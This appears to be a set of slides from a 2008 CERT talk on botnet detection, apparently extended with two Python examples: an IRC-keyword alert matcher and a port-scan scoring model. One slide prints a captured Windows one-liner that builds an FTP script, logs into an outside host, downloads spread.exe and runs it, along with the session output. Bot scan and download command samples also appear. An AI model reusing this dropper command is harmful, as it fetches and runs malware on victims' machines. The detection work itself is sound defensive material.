China Science & Technology Network Computer Emergency Response Team
Botnet Detection and Network Security Alert
Tao JING
[email protected], CNIC
(+86)-010-58812898
CANS 2008, Indiana University, 2008-10-21
Agenda
• About CSTCERT
• About Botnet
• Network Security Alert
• Future work
CSTCERT Overview
• CSTCERT (China Science and Technology Network Computer Emergency Response Team) was founded in 2002.
• CSTCERT is supervised by CSTNET.
• Services:
  – Incident handling, including attacks, complaints, abnormal traffic detection and other related security incidents
  – Research and development: emergency response
  – Security training
• Contact: http://cert.cstnet.cn, +86-010-58812935, [email protected]
Our work
• From 2007.9 to 2008.9 we handled 266 security events:
  – security incidents: 205
  – security complaints: 61
[Chart: breakdown of handled events by type: port scanning 55%, brute force 29%, phishing cheat 9%, SQL injection 5%, address probe 2%]
Security status is very serious! Why?
• You can become a hacker very easily:
  – Know a little knowledge
  – Search for hacker methods on the Internet
  – Many people share their hacker tools
  – If you want to pay some money, someone will teach you hacker techniques
About Botnet
• A botnet is a collection of computers, connected to the Internet, that interact to accomplish some distributed task.
• Botnet typically refers to such a system designed and used for illegal purposes.
• The compromised machines are referred to as drones or zombies, the malicious software running on them as 'bot'.
From: www.shadowserver.org
What can a botnet cause?
How can we find Botnet?
• Active way:
  – Network protocol analysis: IRC
  – Monitor some special TCP ports (135/139/445/1433/22/2967……)
  – Check C&C (Command and Control Center) server address updates from the Internet:
    • http://www.cyber-ta.org/
    • http://www.shadowserver.org
• Passive way:
  – honeypot
Main Characteristics of Botnet
• IRC messages
  – Port scan: advscan, asc…
  – File download: download
  – Others: ping/pong, join, mode…
• Scanned TCP ports: 135/139/445/1433/22/2967
• Vulnerabilities that botnets always exploit
  – Weak password (ssh/MS-SQL/windows)
  – Overflow vulnerability (MS-SQL/windows/software)
The host was controlled by this method-1: sometimes the scan control command is used
The host was controlled by this method-2: sometimes malware is installed
C:\Documents and Settings\jackie>cmd /c echo open spreadem.nowslate1703.info 21>appmr.dll &echo user spread baby >>appmr.dll &echo binary >>appmr.dll &echo get >>appmr.dll &echo spread.exe >>appmr.dll &echo spread.exe >>appmr.dll &echo bye >>appmr.dll &ftp.exe -n -s:appmr.dll &del appmr.dll &spread.exe
ftp> open spreadem.nowslate1703.info 21
Connected to spreadem.nowslate1703.info.
220---------- Welcome to Pure-FTPd [TLS] ----------
220-You are user number 73 of 200 allowed.
220-Local time is now 00:15. Server port: 21.
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 2 minutes of inactivity.
ftp> user spread baby
331 User spread OK. Password required
230-User spread has group access to: spread
230 OK. Current restricted directory is /
ftp> binary
200 TYPE is now 8-bit binary
ftp> get
Remote file spread.exe
Local file spread.exe
200 PORT command successful
150-Connecting to port 1555
150 83.1 kbytes to download
226-File successfully transferred
226 0.750 seconds (measured here), 110.70 Kbytes per second
ftp: 85057 bytes received in 1.50Seconds 56.70Kbytes/sec.
ftp> bye
221-Goodbye. You uploaded 0 and downloaded 84 kbytes.
221 Logout.
C:\Documents and Settings\jackie>
Network security alert - IDS/IPS rule
• For port scan: use some IRC message words: asc/advscan
• For network communication with IRC: Ping/Pong, JOIN, PRIVMSG ……
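Added example (not from the talk) of how the IRC-word rules above can be applied to logged IRC traffic: the lines parse each message into prefix, command and trailing text, then flag PRIVMSGs whose first word is asc/advscan or download. The IRC log lines are constructed, the '.'-prefixed command convention and the severity labels are assumptions.

```python
import re

# Constructed IRC lines as a sensor might log them (not a real capture); the
# command words and ports are the ones the slides name, hosts are .invalid.
SAMPLE_IRC_LINES = [
    ":bot01!u@h PRIVMSG #c :.asc dcom135 200 5 0 -r -s",
    ":bot02!u@h PRIVMSG #c :.advscan lsass445 150 3 0 -b",
    ":bot03!u@h PRIVMSG #c :.download http://dl.example.invalid/x.exe c:\\x.exe 1",
    ":alice!u@h PRIVMSG #chat :hello, anyone around?",
    "PING :irc.example.invalid",
    ":bot01!u@h JOIN #c",
]

SCAN_WORDS = {"asc", "advscan"}              # port-scan commands from the slide
DOWNLOAD_WORDS = {"download"}                # file-download command from the slide
BOT_PORTS = {135, 139, 445, 1433, 22, 2967}  # ports the slide lists as scan targets


def parse_irc(line):
    """Split an RFC 1459 line into prefix, command, params and trailing text."""
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    head, sep, trailing = line.partition(" :")
    parts = head.split() or [""]
    return {"prefix": prefix, "cmd": parts[0], "params": parts[1:],
            "trailing": trailing if sep else None}


def classify(line):
    """Return (severity, kind, nick, detail) if the line matches a rule, else None."""
    msg = parse_irc(line)
    if msg["cmd"] != "PRIVMSG" or not msg["trailing"]:
        return None                                  # JOIN/PING/PONG counted elsewhere
    words = msg["trailing"].split()
    verb = words[0].lstrip(".!").lower()             # assumed '.'/'!' command prefix
    nick = (msg["prefix"] or "?").split("!")[0]
    arg = words[1] if len(words) > 1 else ""
    if verb in SCAN_WORDS:
        m = re.search(r"(\d+)$", arg)                # e.g. "dcom135" -> port 135
        port = int(m.group(1)) if m else None
        return ("high" if port in BOT_PORTS else "medium", "scan", nick, port)
    if verb in DOWNLOAD_WORDS:
        return ("high", "download", nick, arg)
    return None


def alerts(lines):
    """All rule matches over a list of logged IRC lines, in log order."""
    return [a for a in map(classify, lines) if a is not None]


if __name__ == "__main__":
    for sev, kind, nick, detail in alerts(SAMPLE_IRC_LINES):
        print(f"[{sev}] {kind} from {nick}: {detail}")
```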
Rules for IDS
Network security alert - Network traffic data analysis
• We can build a simple mathematical model to describe network traffic data by a numerical analysis method (NTNA model):

  p_i = w_1 * (n_i / n_all) + w_2 * (c_i / c_all)

  c_all = c_1 + c_2 + ... + c_n,   n_all = n_1 + n_2 + ... + n_n

  where, for one special destination port:
  w_1, w_2: weights for the degree of effect of each term
  c_i: count of connections from this src_ip to this destination port
  c_all: all of the counts for this destination port
  n_i: amount of unique target IPs for this destination port that have the same source IP (src_ip)
  n_all: all of the unique target IP amounts for this destination port
  p_i: probability that we think this src_ip is scanning
Data of tcp 1433 scan, data of tcp 22 scan, data of other port scan, ……
One table per scanned port, with the source IP, its connection count and its amount of target IPs:

  data of src ip | data of counts | amounts of target ip
  Src_ip1        | Count_1        | Dst_ipsum_1
  Src_ip2        | Count_2        | Dst_ipsum_2
  。。。           | 。。。           | 。。。
  Src_ipn        | Count_n        | Dst_ipsum_n
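Added example (not from the talk) that builds the per-port table above from connection records and scores each source with the NTNA formula p_i = w_1 * n_i/n_all + w_2 * c_i/c_all, where c_all and n_all are the sums over all sources. The connection records, the weights w_1 = w_2 = 0.5 and the flagging threshold 0.5 are assumptions.

```python
from collections import defaultdict

# Constructed connection records (src_ip, dst_ip, dst_port) standing in for the
# collected traffic data; these are not real CSTNET observations.
SAMPLE_FLOWS = (
    [("10.0.0.5", f"192.168.1.{i}", 1433) for i in range(1, 41)]      # 40 targets, once each
    + [("10.0.0.7", f"192.168.1.{i}", 1433) for i in range(1, 6)] * 4  # 5 targets, 4 times each
    + [("10.0.0.9", "192.168.1.50", 1433)] * 2                         # one target, twice
    + [("10.0.0.5", "192.168.2.1", 22)]                                # other port, not in this table
)


def port_table(flows, dst_port):
    """Per-source (Count_i, Dst_ipsum_i) for one destination port, as in the slide's table."""
    counts = defaultdict(int)
    targets = defaultdict(set)
    for src, dst, port in flows:
        if port == dst_port:
            counts[src] += 1
            targets[src].add(dst)
    return {src: (counts[src], len(targets[src])) for src in counts}


def ntna_scores(flows, dst_port, w1=0.5, w2=0.5):
    """p_i = w1 * n_i / n_all + w2 * c_i / c_all for every source seen on dst_port.

    c_i = connections from src_ip_i, n_i = its distinct target IPs;
    c_all and n_all are the sums of c_i and n_i over all sources.
    """
    table = port_table(flows, dst_port)
    c_all = sum(c for c, _ in table.values())
    n_all = sum(n for _, n in table.values())
    if c_all == 0:                     # no traffic on this port: nothing to score
        return {}
    return {src: w1 * n / n_all + w2 * c / c_all for src, (c, n) in table.items()}


def rank_sources(flows, dst_port, threshold=0.5):
    """Sources whose score reaches the threshold, highest first (assumed threshold)."""
    scores = ntna_scores(flows, dst_port)
    return sorted(((src, round(p, 4)) for src, p in scores.items() if p >= threshold),
                  key=lambda kv: kv[1], reverse=True)


if __name__ == "__main__":
    for src, p in sorted(ntna_scores(SAMPLE_FLOWS, 1433).items(), key=lambda kv: -kv[1]):
        print(f"{src:12s} p={p:.4f}")
    print("flagged on tcp/1433:", rank_sources(SAMPLE_FLOWS, 1433))
```

Because the weights sum to 1 and each ratio sums to 1 across sources, the p_i for one port also sum to 1, so a source's score is its share of the port's scanning activity.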
NTNA model in practice
Future work
• Botnet research
• Monitoring and countermeasures for large-scale network worms
• Some improvements for the NTNA model
  – accuracy amendment
  – extension to larger-scale network traffic data (netflow)
  – data mining
Thank you!
(+86)-010-58812898